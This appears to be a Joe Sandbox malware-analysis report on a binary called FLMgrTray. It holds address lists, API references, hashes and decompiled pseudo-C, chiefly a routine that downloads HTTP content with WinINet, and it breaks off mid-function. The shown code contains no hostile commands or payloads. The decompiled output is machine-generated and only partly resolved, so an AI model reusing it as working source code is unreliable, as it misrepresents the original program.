                                                                                        0x00169e13
                                                                                        0x00169e2d
                                                                                        0x00169e34
                                                                                        0x00169e3c
                                                                                        0x00169e00
                                                                                        0x00169e43
                                                                                        0x00169e49
                                                                                        0x00169e4b
                                                                                        0x00169e4e
                                                                                        0x00169e4f
                                                                                        0x00169e57
                                                                                        0x00169e59
                                                                                        0x00169e5c
                                                                                        0x00169e67
                                                                                        0x00169e69
                                                                                        0x00169e69
                                                                                        0x00169e67
                                                                                        0x00169e6f
                                                                                        0x00169e71
                                                                                        0x00169e76
                                                                                        0x00169e7f
                                                                                        0x00169e82
                                                                                        0x00169e93
                                                                                        0x00169e96
                                                                                        0x00169e99
                                                                                        0x00169ea6
                                                                                        0x00169eb1
                                                                                        0x00169eba
                                                                                        0x00169ec5
                                                                                        0x00169edc
                                                                                        0x00169c19
                                                                                        0x00169c19
                                                                                        0x00169c1a
                                                                                        0x00169c1d
                                                                                        0x00169c22
                                                                                        0x00169c2a
                                                                                        0x00169c2c
                                                                                        0x00169c30
                                                                                        0x00169c3d
                                                                                        0x00169c32
                                                                                        0x00169c32
                                                                                        0x00169c32
                                                                                        0x00169c24
                                                                                        0x00169c24
                                                                                        0x00169c24
                                                                                        0x00169c40
                                                                                        0x00169c46
                                                                                        0x00169c4f
                                                                                        0x00169c52
                                                                                        0x00169c55
                                                                                        0x00169c58
                                                                                        0x00169c5b
                                                                                        0x00169c5e
                                                                                        0x00169c61
                                                                                        0x00169c62
                                                                                        0x00169cb8
                                                                                        0x00169cba
                                                                                        0x00169cc5
                                                                                        0x00169cc7
                                                                                        0x00169cca
                                                                                        0x00169cd0
                                                                                        0x00169cd6
                                                                                        0x00169c64
                                                                                        0x00169c64
                                                                                        0x00169c68
                                                                                        0x00169c6d
                                                                                        0x00169c70
                                                                                        0x00169c73
                                                                                        0x00169c76
                                                                                        0x00169c78
                                                                                        0x00169c7f
                                                                                        0x00169c86
                                                                                        0x00169c9a
                                                                                        0x00169c9a
                                                                                        0x00169c9c
                                                                                        0x00169ca1
                                                                                        0x00169ca7
                                                                                        0x00169caf
                                                                                        0x00169c88
                                                                                        0x00169c88
                                                                                        0x00169c88
                                                                                        0x00169c8b
                                                                                        0x00169c8e
                                                                                        0x00169c90
                                                                                        0x00169c90
                                                                                        0x00169c96
                                                                                        0x00169cb2
                                                                                        0x00000000
                                                                                        0x00169c98
                                                                                        0x00169c98
                                                                                        0x00000000
                                                                                        0x00169c98
                                                                                        0x00169c96
                                                                                        0x00169c86
                                                                                        0x00169c62
                                                                                        0x00169be7
                                                                                        0x00169be7
                                                                                        0x00169bea
                                                                                        0x00169bf0
                                                                                        0x00169bf2
                                                                                        0x00169bf2
                                                                                        0x00169bf4
                                                                                        0x00169bf7
                                                                                        0x00169bfa
                                                                                        0x00169c04
                                                                                        0x00169c04
                                                                                        0x0016996c
                                                                                        0x0016997b
                                                                                        0x0016997b
                                                                                        0x0016997e
                                                                                        0x00169981
                                                                                        0x00169987
                                                                                        0x00169989
                                                                                        0x0016998b
                                                                                        0x0016998b
                                                                                        0x00169995
                                                                                        0x0016999a
                                                                                        0x001699a5
                                                                                        0x001699a8
                                                                                        0x001699ac
                                                                                        0x001699b5
                                                                                        0x001699b7
                                                                                        0x001699ba
                                                                                        0x001699c3
                                                                                        0x001699cd
                                                                                        0x001699d1
                                                                                        0x001699d9
                                                                                        0x001699e1
                                                                                        0x001699e6
                                                                                        0x001699ed
                                                                                        0x001699f2
                                                                                        0x001699f6
                                                                                        0x001699fa
                                                                                        0x001699ff
                                                                                        0x001699ff
                                                                                        0x00169a07
                                                                                        0x00169a09
                                                                                        0x00169a10
                                                                                        0x00169a18
                                                                                        0x00169a1f
                                                                                        0x00169a23
                                                                                        0x00169a25
                                                                                        0x00169a25
                                                                                        0x00169a2c
                                                                                        0x00169a31
                                                                                        0x00169a35
                                                                                        0x00169a38
                                                                                        0x00169a3c
                                                                                        0x00169a3e
                                                                                        0x00169a45
                                                                                        0x00169a4b
                                                                                        0x00169a56
                                                                                        0x00169a68
                                                                                        0x00169a6a
                                                                                        0x00169a58
                                                                                        0x00169a58
                                                                                        0x00169a58
                                                                                        0x00169a70
                                                                                        0x00169a70
                                                                                        0x00169a77
                                                                                        0x00169a8d
                                                                                        0x00169a90
                                                                                        0x00169a96
                                                                                        0x00169ab2
                                                                                        0x00169ab7
                                                                                        0x00169a79
                                                                                        0x00169a79
                                                                                        0x00169a88
                                                                                        0x00169a8a
                                                                                        0x00000000
                                                                                        0x00169a8a
                                                                                        0x00169a88
                                                                                        0x00169abd
                                                                                        0x00169ac2
                                                                                        0x00169acb
                                                                                        0x00169ad0
                                                                                        0x00169ad0
                                                                                        0x00169ad5
                                                                                        0x00169ad8
                                                                                        0x00169adf
                                                                                        0x00169b0d
                                                                                        0x00169b0d
                                                                                        0x00169b10
                                                                                        0x00169b17
                                                                                        0x00169b45
                                                                                        0x00169b45
                                                                                        0x00000000
                                                                                        0x00169b19
                                                                                        0x00169b19
                                                                                        0x00169b1c
                                                                                        0x00169b1d
                                                                                        0x00169b25
                                                                                        0x00169b3b
                                                                                        0x00169b3b
                                                                                        0x00169b3d
                                                                                        0x00169b42
                                                                                        0x00000000
                                                                                        0x00169b27
                                                                                        0x00169b27
                                                                                        0x00169b2a
                                                                                        0x00169b35
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00169b35
                                                                                        0x00169b25
                                                                                        0x00169ae1
                                                                                        0x00169ae1
                                                                                        0x00169ae4
                                                                                        0x00169ae5
                                                                                        0x00169aed
                                                                                        0x00169b03
                                                                                        0x00169b03
                                                                                        0x00169b05
                                                                                        0x00169b0a
                                                                                        0x00000000
                                                                                        0x00169aef
                                                                                        0x00169aef
                                                                                        0x00169af2
                                                                                        0x00169af7
                                                                                        0x00169afd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00169afd
                                                                                        0x00169aed
                                                                                        0x00169adf
                                                                                        0x00169966
                                                                                        0x00169949
                                                                                        0x00169876
                                                                                        0x00169876
                                                                                        0x00169877
                                                                                        0x0016987f
                                                                                        0x00169895
                                                                                        0x00169895
                                                                                        0x00169897
                                                                                        0x0016989c
                                                                                        0x00000000
                                                                                        0x00169881
                                                                                        0x00169881
                                                                                        0x00169884
                                                                                        0x00169889
                                                                                        0x0016988f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016988f
                                                                                        0x0016987f
                                                                                        0x00000000
                                                                                        0x00169b48
                                                                                        0x00169b48
                                                                                        0x00169b4b
                                                                                        0x00169b4e
                                                                                        0x00000000
                                                                                        0x00169810
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 001696D9
                                                                                        • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 001696F9
                                                                                          • Part of subcall function 001692B0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(2C80D730,00000000,00168233,?,?,-00000060,0018D099,000000FF,?,0016973B,00168233,00000001), ref: 001692DB
                                                                                          • Part of subcall function 001692B0: memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,-00000060,0018D099,000000FF,?,0016973B,00168233,00000001), ref: 0016935F
                                                                                          • Part of subcall function 00169140: ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,2C80D730,00000000,00168233,?,0000000A,00168233,00000001), ref: 00169198
                                                                                          • Part of subcall function 00169140: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,0000000A,00168233,00000001), ref: 001691DB
                                                                                          • Part of subcall function 00169140: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,0000000A,00168233,00000001), ref: 00169270
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,-00000010,00000000,001901E0,?,?,?,?,?,?,?,?), ref: 001697EB
                                                                                        • memchr.VCRUNTIME140(?,0000003A,?,00000000,?,?), ref: 00169901
                                                                                        • memchr.VCRUNTIME140(00000001,0000003A,?,?,?,00000000,?,?), ref: 00169932
                                                                                        • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?), ref: 00169B8F
                                                                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00169B9B
                                                                                          • Part of subcall function 00164210: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP140(invalid string position,001645EE,00000000,?,2C80D730,?,?,?,?,2C80D730,?,2C80D730,?,?,?), ref: 00164215
                                                                                          • Part of subcall function 00164210: memset.VCRUNTIME140(00000000,?,?,?,?,2C80D730,?,?,?,2C80D730,?,?,?,?,2C80D730), ref: 0016425A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$memchr$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@_Ipfx@?$basic_istream@V?$basic_streambuf@Xout_of_range@std@@_invalid_parameter_noinfo_noreturnmemcpymemset
                                                                                        • String ID: $HTTP
                                                                                        • API String ID: 749794985-42340939
                                                                                        • Opcode ID: cd781e45981711e845d72798264a46f042b9984a12111528b0022f3ed5a288c0
                                                                                        • Instruction ID: 05314a4fa7d5a35d1367f0df234e6d1a1e41cff019ffd2be796c82f0b5b276ac
                                                                                        • Opcode Fuzzy Hash: cd781e45981711e845d72798264a46f042b9984a12111528b0022f3ed5a288c0
                                                                                        • Instruction Fuzzy Hash: AE028A71D00248DFDB19CFA8C884BEDFBB9BF55314F24815AE805AB291D770AA95CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 53%
                                                                                        			E00184080(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48, void* _a52) {
                                                                                        				void* _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				void _v1044;
                                                                                        				void* _v1072;
                                                                                        				char _v1092;
                                                                                        				char _v1180;
                                                                                        				void _v1184;
                                                                                        				void _v1188;
                                                                                        				int _v1192;
                                                                                        				unsigned int _v1196;
                                                                                        				void* _v1208;
                                                                                        				void* __ebp;
                                                                                        				signed int _t75;
                                                                                        				signed int _t76;
                                                                                        				intOrPtr _t85;
                                                                                        				void** _t105;
                                                                                        				void* _t111;
                                                                                        				void* _t113;
                                                                                        				void _t127;
                                                                                        				void _t131;
                                                                                        				void* _t135;
                                                                                        				intOrPtr _t144;
                                                                                        				void* _t145;
                                                                                        				void* _t151;
                                                                                        				signed int _t154;
                                                                                        				void _t155;
                                                                                        				void* _t157;
                                                                                        				void* _t160;
                                                                                        				intOrPtr _t161;
                                                                                        				intOrPtr _t162;
                                                                                        				void* _t163;
                                                                                        				void _t164;
                                                                                        				unsigned int _t165;
                                                                                        				int _t170;
                                                                                        				void* _t172;
                                                                                        				intOrPtr _t174;
                                                                                        				void* _t175;
                                                                                        				void* _t176;
                                                                                        				signed int _t177;
                                                                                        				void* _t179;
                                                                                        				void* _t180;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E68B);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t180 = _t179 - 0x49c;
                                                                                        				_t75 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t76 = _t75 ^ _t177;
                                                                                        				_v20 = _t76;
                                                                                        				_push(_t76);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t135 = _a52;
                                                                                        				_v8 = 1;
                                                                                        				_t172 = 0;
                                                                                        				E00183540( &_v1180);
                                                                                        				_t80 =  >=  ? _a4 :  &_a4;
                                                                                        				_v8 = 2;
                                                                                        				if(E00185D80( &_v1180, _a24 - 0x10,  >=  ? _a4 :  &_a4, 0, 0, "Mozilla/4.0 (compatible; )") == 0) {
                                                                                        					L26:
                                                                                        					E00183690( &_v1180);
                                                                                        					_t161 = _a24;
                                                                                        					if(_t161 >= 0x10) {
                                                                                        						_t145 = _a4;
                                                                                        						_t164 = _t161 + 1;
                                                                                        						_t88 = _t145;
                                                                                        						if(_t164 >= 0x1000) {
                                                                                        							_t145 =  *((intOrPtr*)(_t145 - 4));
                                                                                        							_t164 = _t164 + 0x23;
                                                                                        							if(_t88 > 0x1f) {
                                                                                        								goto L29;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L30;
                                                                                        					}
                                                                                        					goto L31;
                                                                                        				} else {
                                                                                        					_t147 =  >=  ? _a28 :  &_a28;
                                                                                        					_t92 =  >=  ? _v1092 :  &_v1092;
                                                                                        					if(E00186500( &_v1180,  >=  ? _v1092 :  &_v1092, 1,  >=  ? _a28 :  &_a28) == 0) {
                                                                                        						L25:
                                                                                        						E00185D50( &_v1180);
                                                                                        						goto L26;
                                                                                        					} else {
                                                                                        						memset( &_v1044, 0, 0x400);
                                                                                        						_t180 = _t180 + 0xc;
                                                                                        						_v1192 = 0;
                                                                                        						_push( &_v1192);
                                                                                        						if(E00186EF0( &_v1180,  &_v1044, 0x400) != 0) {
                                                                                        							asm("o16 nop [eax+eax]");
                                                                                        							while(1) {
                                                                                        								_t170 = _v1192;
                                                                                        								if(_t170 == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t165 =  *(_t135 + 0x14);
                                                                                        								_t174 =  *((intOrPtr*)(_t135 + 0x10));
                                                                                        								_v1196 = _t165;
                                                                                        								if(_t170 > _t165 - _t174) {
                                                                                        									__eflags = 0x7fffffff - _t174 - _t170;
                                                                                        									if(0x7fffffff - _t174 < _t170) {
                                                                                        										E001631F0(_t165);
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										_push(_t177);
                                                                                        										_push(0xc);
                                                                                        										_t105 = E00175703();
                                                                                        										_t151 = _v1208;
                                                                                        										__eflags = _t151;
                                                                                        										if(_t151 != 0) {
                                                                                        											 *_t105 = _t151;
                                                                                        											_t105[1] = _a4;
                                                                                        											return _t105;
                                                                                        										} else {
                                                                                        											 *_t105 = _t105;
                                                                                        											_t105[1] = _t105;
                                                                                        											return _t105;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t154 = _t170 + _t174 | 0x0000000f;
                                                                                        										__eflags = _t154 - 0x7fffffff;
                                                                                        										if(_t154 <= 0x7fffffff) {
                                                                                        											_v1184 = _t165 >> 1;
                                                                                        											__eflags = _t165 - 0x7fffffff - _v1184;
                                                                                        											if(_t165 <= 0x7fffffff - _v1184) {
                                                                                        												_t111 = _v1184 + _t165;
                                                                                        												__eflags = _t154 - _t111;
                                                                                        												_t155 =  <  ? _t111 : _t154;
                                                                                        											} else {
                                                                                        												_t155 = 0x7fffffff;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t155 = 0x7fffffff;
                                                                                        										}
                                                                                        										_t35 = _t155 + 1; // 0x80000000
                                                                                        										_v1184 = _t155;
                                                                                        										_t113 = E00163200(_t165, _t35);
                                                                                        										__eflags = _v1196 - 0x10;
                                                                                        										_t157 = _t113;
                                                                                        										_v1188 = _t157;
                                                                                        										 *((intOrPtr*)(_t135 + 0x10)) = _t170 + _t174;
                                                                                        										 *(_t135 + 0x14) = _v1184;
                                                                                        										_push(_t174);
                                                                                        										if(_v1196 < 0x10) {
                                                                                        											memcpy(_t157, _t135, ??);
                                                                                        											_t175 = _t174 + _v1188;
                                                                                        											__eflags = _t175;
                                                                                        											memcpy(_t175,  &_v1044, _t170);
                                                                                        											_t180 = _t180 + 0x18;
                                                                                        											 *((char*)(_t175 + _t170)) = 0;
                                                                                        											goto L21;
                                                                                        										} else {
                                                                                        											_v1184 =  *_t135;
                                                                                        											memcpy(_t157, _t123, ??);
                                                                                        											_t172 = _t174 + _v1188;
                                                                                        											memcpy(_t172,  &_v1044, _t170);
                                                                                        											_t180 = _t180 + 0x18;
                                                                                        											_t127 = _v1184;
                                                                                        											_t160 = 1 + _v1196;
                                                                                        											 *((char*)(_t172 + _t170)) = 0;
                                                                                        											__eflags = _t160 - 0x1000;
                                                                                        											if(_t160 < 0x1000) {
                                                                                        												L19:
                                                                                        												_push(_t160);
                                                                                        												E00175733(_t127, _t127);
                                                                                        												_t180 = _t180 + 8;
                                                                                        												L21:
                                                                                        												 *_t135 = _v1188;
                                                                                        												goto L22;
                                                                                        											} else {
                                                                                        												_t164 =  *(_t127 - 4);
                                                                                        												_t145 = _t160 + 0x23;
                                                                                        												_t88 = _t127 - _t164 + 0xfffffffc;
                                                                                        												__eflags = _t127 - _t164 + 0xfffffffc - 0x1f;
                                                                                        												if(_t127 - _t164 + 0xfffffffc > 0x1f) {
                                                                                        													L29:
                                                                                        													__imp___invalid_parameter_noinfo_noreturn();
                                                                                        													L30:
                                                                                        													_push(_t164);
                                                                                        													E00175733(_t88, _t145);
                                                                                        													_t180 = _t180 + 8;
                                                                                        													L31:
                                                                                        													_t162 = _a48;
                                                                                        													_a20 = 0;
                                                                                        													_a24 = 0xf;
                                                                                        													_a4 = 0;
                                                                                        													if(_t162 >= 0x10) {
                                                                                        														_t144 = _a28;
                                                                                        														_t163 = _t162 + 1;
                                                                                        														_t85 = _t144;
                                                                                        														if(_t163 >= 0x1000) {
                                                                                        															_t144 =  *((intOrPtr*)(_t144 - 4));
                                                                                        															_t163 = _t163 + 0x23;
                                                                                        															if(_t85 > 0x1f) {
                                                                                        																__imp___invalid_parameter_noinfo_noreturn();
                                                                                        															}
                                                                                        														}
                                                                                        														_push(_t163);
                                                                                        														E00175733(_t85, _t144);
                                                                                        													}
                                                                                        													 *[fs:0x0] = _v16;
                                                                                        													return E001755F4(_v20 ^ _t177);
                                                                                        												} else {
                                                                                        													_t127 = _t164;
                                                                                        													goto L19;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									 *((intOrPtr*)(_t135 + 0x10)) = _t170 + _t174;
                                                                                        									_t131 = _t135;
                                                                                        									if(_t165 >= 0x10) {
                                                                                        										_t131 =  *_t135;
                                                                                        									}
                                                                                        									_t176 = _t174 + _t131;
                                                                                        									memmove(_t176,  &_v1044, _t170);
                                                                                        									_t180 = _t180 + 0xc;
                                                                                        									 *((char*)(_t176 + _t170)) = 0;
                                                                                        									L22:
                                                                                        									_push( &_v1192);
                                                                                        									if(E00186EF0( &_v1180,  &_v1044, 0x400) != 0) {
                                                                                        										continue;
                                                                                        									} else {
                                                                                        										_t172 = 0;
                                                                                        										goto L25;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							_t172 = 1;
                                                                                        						}
                                                                                        						goto L25;
                                                                                        					}
                                                                                        				}
                                                                                        				L41:
                                                                                        			}













































                                                                                        0x00184083
                                                                                        0x00184085
                                                                                        0x00184090
                                                                                        0x00184091
                                                                                        0x00184097
                                                                                        0x0018409c
                                                                                        0x0018409e
                                                                                        0x001840a4
                                                                                        0x001840a8
                                                                                        0x001840ae
                                                                                        0x001840b7
                                                                                        0x001840be
                                                                                        0x001840c0
                                                                                        0x001840d1
                                                                                        0x001840de
                                                                                        0x001840e9
                                                                                        0x00184305
                                                                                        0x0018430b
                                                                                        0x00184310
                                                                                        0x00184316
                                                                                        0x00184318
                                                                                        0x0018431b
                                                                                        0x0018431c
                                                                                        0x00184324
                                                                                        0x00184326
                                                                                        0x00184329
                                                                                        0x00184334
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00184334
                                                                                        0x00000000
                                                                                        0x00184324
                                                                                        0x00000000
                                                                                        0x001840ef
                                                                                        0x001840fc
                                                                                        0x00184108
                                                                                        0x0018411f
                                                                                        0x001842fa
                                                                                        0x00184300
                                                                                        0x00000000
                                                                                        0x00184125
                                                                                        0x00184132
                                                                                        0x00184137
                                                                                        0x0018413a
                                                                                        0x0018414c
                                                                                        0x00184160
                                                                                        0x00184166
                                                                                        0x00184170
                                                                                        0x00184170
                                                                                        0x00184178
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018417e
                                                                                        0x00184183
                                                                                        0x00184188
                                                                                        0x00184190
                                                                                        0x001841c4
                                                                                        0x001841c6
                                                                                        0x001843ac
                                                                                        0x001843b1
                                                                                        0x001843b2
                                                                                        0x001843b3
                                                                                        0x001843b4
                                                                                        0x001843b5
                                                                                        0x001843b6
                                                                                        0x001843b7
                                                                                        0x001843b8
                                                                                        0x001843b9
                                                                                        0x001843ba
                                                                                        0x001843bb
                                                                                        0x001843bc
                                                                                        0x001843bd
                                                                                        0x001843be
                                                                                        0x001843bf
                                                                                        0x001843c0
                                                                                        0x001843c3
                                                                                        0x001843c5
                                                                                        0x001843ca
                                                                                        0x001843d0
                                                                                        0x001843d2
                                                                                        0x001843e4
                                                                                        0x001843e6
                                                                                        0x001843ea
                                                                                        0x001843d4
                                                                                        0x001843d8
                                                                                        0x001843da
                                                                                        0x001843de
                                                                                        0x001843de
                                                                                        0x001841cc
                                                                                        0x001841cf
                                                                                        0x001841d2
                                                                                        0x001841d8
                                                                                        0x001841e5
                                                                                        0x001841f6
                                                                                        0x001841f8
                                                                                        0x00184207
                                                                                        0x00184209
                                                                                        0x0018420b
                                                                                        0x001841fa
                                                                                        0x001841fa
                                                                                        0x001841fa
                                                                                        0x001841da
                                                                                        0x001841da
                                                                                        0x001841da
                                                                                        0x0018420e
                                                                                        0x00184211
                                                                                        0x0018421a
                                                                                        0x0018421f
                                                                                        0x00184226
                                                                                        0x0018422b
                                                                                        0x00184231
                                                                                        0x0018423a
                                                                                        0x0018423d
                                                                                        0x0018423e
                                                                                        0x001842a3
                                                                                        0x001842a8
                                                                                        0x001842a8
                                                                                        0x001842b7
                                                                                        0x001842bc
                                                                                        0x001842bf
                                                                                        0x00000000
                                                                                        0x00184240
                                                                                        0x00184244
                                                                                        0x0018424a
                                                                                        0x0018424f
                                                                                        0x0018425e
                                                                                        0x00184269
                                                                                        0x0018426c
                                                                                        0x00184272
                                                                                        0x00184273
                                                                                        0x00184277
                                                                                        0x0018427d
                                                                                        0x00184295
                                                                                        0x00184295
                                                                                        0x00184297
                                                                                        0x0018429c
                                                                                        0x001842c3
                                                                                        0x001842c9
                                                                                        0x00000000
                                                                                        0x0018427f
                                                                                        0x0018427f
                                                                                        0x00184282
                                                                                        0x00184287
                                                                                        0x0018428a
                                                                                        0x0018428d
                                                                                        0x00184336
                                                                                        0x00184336
                                                                                        0x0018433c
                                                                                        0x0018433c
                                                                                        0x0018433e
                                                                                        0x00184343
                                                                                        0x00184346
                                                                                        0x00184346
                                                                                        0x00184349
                                                                                        0x00184350
                                                                                        0x00184357
                                                                                        0x0018435e
                                                                                        0x00184360
                                                                                        0x00184363
                                                                                        0x00184364
                                                                                        0x0018436c
                                                                                        0x0018436e
                                                                                        0x00184371
                                                                                        0x0018437c
                                                                                        0x0018437e
                                                                                        0x0018437e
                                                                                        0x0018437c
                                                                                        0x00184384
                                                                                        0x00184386
                                                                                        0x0018438b
                                                                                        0x00184393
                                                                                        0x001843ab
                                                                                        0x00184293
                                                                                        0x00184293
                                                                                        0x00000000
                                                                                        0x00184293
                                                                                        0x0018428d
                                                                                        0x0018427d
                                                                                        0x0018423e
                                                                                        0x00184192
                                                                                        0x00184195
                                                                                        0x00184198
                                                                                        0x0018419d
                                                                                        0x0018419f
                                                                                        0x0018419f
                                                                                        0x001841a1
                                                                                        0x001841ac
                                                                                        0x001841b1
                                                                                        0x001841b4
                                                                                        0x001842cb
                                                                                        0x001842d1
                                                                                        0x001842eb
                                                                                        0x00000000
                                                                                        0x001842f1
                                                                                        0x001842f1
                                                                                        0x00000000
                                                                                        0x001842f1
                                                                                        0x001842eb
                                                                                        0x00000000
                                                                                        0x00184190
                                                                                        0x001842f5
                                                                                        0x001842f5
                                                                                        0x00000000
                                                                                        0x00184160
                                                                                        0x0018411f
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00185DC0
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00185DD3
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000), ref: 00185DE6
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185DF9
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?), ref: 00185E0C
                                                                                          • Part of subcall function 00185D80: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,https,00000005,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185E62
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000001,?,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,00000000,00000000,?), ref: 00184132
                                                                                          • Part of subcall function 00186EF0: InternetReadFile.WININET(?,00000400,?,00000000), ref: 00186F40
                                                                                        • memmove.VCRUNTIME140(00000000,?,00000000,?,00000400,00000000,00000000,00000000,?), ref: 001841AC
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000400,00000000), ref: 0018424A
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000,00000000,?,00000000,?,?,00000400,00000000), ref: 0018425E
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000400,00000000), ref: 001842A3
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000,00000000,?,00000000,?,?,00000400,00000000), ref: 001842B7
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,00000000,00000000,?), ref: 00184336
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,00000000,00000000,?), ref: 0018437E
                                                                                        Strings
                                                                                        • Mozilla/4.0 (compatible; ), xrefs: 001840CC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$_invalid_parameter_noinfo_noreturn$FileInternetReadmemmovestrncmp
                                                                                        • String ID: Mozilla/4.0 (compatible; )
                                                                                        • API String ID: 4071406481-1978366481
                                                                                        • Opcode ID: 11ae5557da0430aaee5a271886a6448fcdd91301567a52e15e6428e5c769a8bc
                                                                                        • Instruction ID: 9c570825d31c684df834405dc946377ae66703ed5fd231ebfaa388051e9310ae
                                                                                        • Opcode Fuzzy Hash: 11ae5557da0430aaee5a271886a6448fcdd91301567a52e15e6428e5c769a8bc
                                                                                        • Instruction Fuzzy Hash: 3091D5B1A001199FCB24EF28CC84BEEB7B9EF55314F5041A9F91997281EB309B84CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E0016E090(void* __ebx, void* __ecx) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				char _v44;
                                                                                        				char _v160;
